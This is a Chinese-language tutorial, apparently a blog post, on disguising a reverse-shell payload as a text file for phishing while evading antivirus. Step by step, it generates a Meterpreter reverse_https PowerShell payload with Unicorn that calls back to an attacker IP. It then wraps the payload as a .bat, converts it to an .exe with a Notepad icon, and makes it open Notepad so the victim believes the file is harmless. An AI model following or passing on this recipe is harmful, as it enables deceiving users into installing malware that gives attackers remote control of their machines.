一个免杀钓鱼思路分享

左侧的文件是真实文本文件。右边的文件是PowerShell有效负载，两者看起来基本一模一样，可以看到都是.txt的文件名。打开我们的木马文件跟我们打开笔记本应用没有任何分别。

但是我们的木马在后台悄悄执行了。CS MSF等等C2正常上线。

1.生成Shellcode

1.我们使用CS MSF等等C2生成的powershell等shellcode.

这里使用MSF演示。然后为了方便免杀，我们联动一个名为Unicorn的工具来生成shellcode吧。

Unicorn工具的主要作用是将复杂的shellcode有效负载直接注入内存。这样能达到一些免杀的作用。

在kali中使用git clone github.com/trustedsec/unicorn克隆Unicorn GitHub存储库。

进入Unicorn文件目录,然后

./unicorn.py windows/Meterpreter/reverse_https 192.168.50.146 4444

Unicorn将使用Metasploit reverse_https模块通过指定的端口连接到攻击者的ip地址。

会生成一个powershell的shellcode文件.txt和一个MSF的配置文件.c

把生成的unicorn.c文件导进MSF中打开

MSF会自动配置监听和其他配置。

我们看看原始的Uniocrn生成shellcode的免杀情况

还不错，其实这个shellcode直接使用也能上线的。但是我们的目的不是这个。

但是我们是钓鱼，钓鱼就一些迷惑的东西。将先前创建的PowerShell有效负载移至Windows系统，并另存为Payload.bat

我们去https://github.com/B00merang-Project/Windows-10-Icons’下载Windows 10图标。

在kali中就使用git下载吧

git clone'https://github.com/B00merang-Project/Windows-10-Icons

该文件中可能不包含内置Windows 10图标的确切副本，但是看起来足够接近，可以很好地利用。也可以在网上设计图标或找到更好的图标

2.将PNG转换为ICO格式

PNG将需要转换为Windows ICO图标格式。可以使用在线工具（如ConvertICO）完成此操作。只需将所需的PNG上传到网站，它将以ICO格式输出。

这里我们使用的是记事本的图标。

安装BAT2EXE

在Windows中，访问以下URL以下载B2E。

https://github.com/tokyoneon/B2E/raw/master/Bat_To_Exe_Converter.zip

解压缩下载文件，然后运行“ Bat_To_Exe_Converter_（Installer）.exe”文件进行安装。

导入有效负载BAT

完成后，启动B2E，然后单击“打开”按钮以导入之前创建的payload.bat。

导入木马有效载荷

然后，将单词“ notepad”添加到payload.bat的顶部，然后单击“保存”。在执行PowerShell有效负载之前，这将使可执行文件在Windows计算机上打开记事本。这样做会使目标用户相信他们刚刚单击的文件确实是合法的文本文件。